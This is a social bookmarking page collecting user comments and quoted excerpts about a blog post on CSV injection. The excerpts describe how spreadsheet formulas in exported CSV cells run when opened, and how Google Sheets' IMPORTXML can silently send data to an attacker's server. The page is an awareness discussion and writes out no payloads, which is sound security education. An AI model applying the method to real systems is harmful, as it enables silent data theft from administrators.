The Absurdly Underestimated Dangers of CSV Injection


109 bookmarks. First posted by fileformat 6 days ago.


The Absurdly Underestimated Dangers of CSV Injection
security  attackvector  csv  dataInjectionAttack  vector  attack 
1 hour ago by psychemedia
In fact - in Excel at least - any of the symbols = , - , + , or @ will trigger this behavior causing lots of fun times for adminstrators whose data just doesn’t seem to format correctly (this is actually what brought my attention first to the issue). And just like that, the attacker has free reign to download a keylogger, install things, and overall remotely execute code not merely on any other person’s computer, but on that of someone guaranteed to have access to all user’s data; for example a manager or a company adminstrator. The attacker starts the cell with their trusty = symbol prefix and then points IMPORTXML to a server they control, appending as a querystring of spreadsheet data. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data. That way, if a reseracher working on a secret warrant is to view their communication in a spreadsheet, a beacon goes out and the criminal has a canary effectively tipping them off that someone is snooping.
2 days ago by sechilds
Any cell that starts with an = is treated as a formula.
You can then execute any formula function.
security  excel  google  csv  injection 
3 days ago by drmeme
This isn't frightening at all because CSV exports from XLS don't run the world or anything.
from twitter
4 days ago by genehack
This isn't frightening at all because CSV exports from XLS don't run the world or anything.
from twitter_favs
4 days ago by nowthis
In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
csv  excel  google  security 
4 days ago by ssorc
info leak and code exec
csv  injection  google  excel  command 
5 days ago by plaxx
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news, but in other ways…well, I think few realize how absolutely devastating and omnipresent this vulnerability can be. It is an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.
excel  security  google 
5 days ago by danesparza
You can include an arbitrary formula, VBA script, or even shell command in a CSV file and MS Excel will execute it at load time with the current user's privileges. Oy.

You can't do this with Google Sheets, but you *can* send all the data in the spreadsheet, and any others that user can reach, to some x-random URI. This is not much nicer.
security  excel  csv  shellinjection 
5 days ago by yorksranter
The Absurdly Underestimated Dangers of CSV Injection
from twitter_favs
5 days ago by reinhard_codes
CSV can be really dangerous.
CSV  attack  hacking 
5 days ago by traggett
I thought by now I'd be too jaded to find anything about spreadsheets shocking, but then I read this.
from twitter_favs
5 days ago by cpsievert
Dang.
s 
5 days ago by jgordon
Man kann mit einer csv Datei den Taschenrechner und alles andere starten? Oh. Autsch.
from twitter
6 days ago by svensonsan
Interesting explanation of "an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV."
security 
6 days ago by shiflett
RT : Well this seems interesting in a bad way
h/t to and his 4 short links
from twitter_favs
6 days ago by gnat
I’ve been doing the local usergroup circuit with this lately and have been asked to write it up. In some ways this is old news ( Edit: Credit where due, I’ve…
from instapaper
6 days ago by nielsk
RT : The Absurdly Underestimated Dangers of CSV Injection
from twitter
6 days ago by kejadlen
CSV is safe, right? Wrong...
6 days ago by NeoNacho
…an attack vector available in every application I’ve ever seen that takes user input and allows administrators to bulk export to CSV.

That is just about every application.
csv  excel  google  security 
6 days ago by dagh
2017-10-07, by George Mauer,

"(...) Even though that cell was quoted it seems to have been interpreted as a formula just because the first character was an = symbol. In fact - in Excel at least - any of the symbols =, -, +, or @ will trigger this behavior (...)"

"(...) Well hold on, a formula is code that executes. So a user can cause code - even if its only formula code - to execute on an administrator’s machine in their user’s security context. (...)"

"(...) This formula is running in the administrator’s browser under their user account and security context. And this is Google Sheets - Sheets are not limited to just their own data, in fact they can pull in data from other spreadsheets that the user has access to. All that an attacker has to know is the other sheet’s id. That information isn’t usually considered secret; it appears in the spreadsheet urls, and will often be accidentally emailed, or posted in intra-company documentation, relying on Google’s security to ensure only authorized users access that data.

So hey, it’s not just your issue/time sheet/whatever data that’s getting exfiltrated. Keep client lists or wage info in a separate spreadsheet that your admin has access to? That info might be getting sucked up as well! All silently, and without anyone knowing anything about it. Yikes! (...)"

"(...) Well it’s not the CSV format’s. The format itself couldn’t be more clear that automatically executing anything that “looks like a formula” is not an intended usage. The bug therefore lies in popular Spreadsheet programs for doing the exact wrong thing. Of course Google Sheets must maintain feature parity with Excel, and Excel must support millions of complex spreadsheets already in existance. Also - I’m not going to research this but - even odds that Excel behavior came from something ancient like Lotus Notes. Getting all spreadsheet programs to change this behavior at this point is a pretty big mountain to counquer. I suppose that it’s everyone else that must change. (...)"
csv  security  google  excel  spreadsheets 
6 days ago by eric.brechemier
Interesting writeup on injecting formulas into CSV data to affect the behavior of the software that is reading the CSV. This example uses the preference that spreadsheets have to interpret formulas embedded in CSV files. Security risks like this can be surprising, even to very technical people, since the data isn't an executable itself.
6 days ago by thingles
RT : Oh, that is new to me. Scary!
from twitter
6 days ago by pulsar
For and other folk:
CSV Injection risks
from twitter
6 days ago by iand
Title exaggerates, but legit security issue: a CSV with a formula in a cell will get that cell to be executed by whoever opens the spreadsheet (Excell gives a warning).
security  via:reddit 
6 days ago by mcherm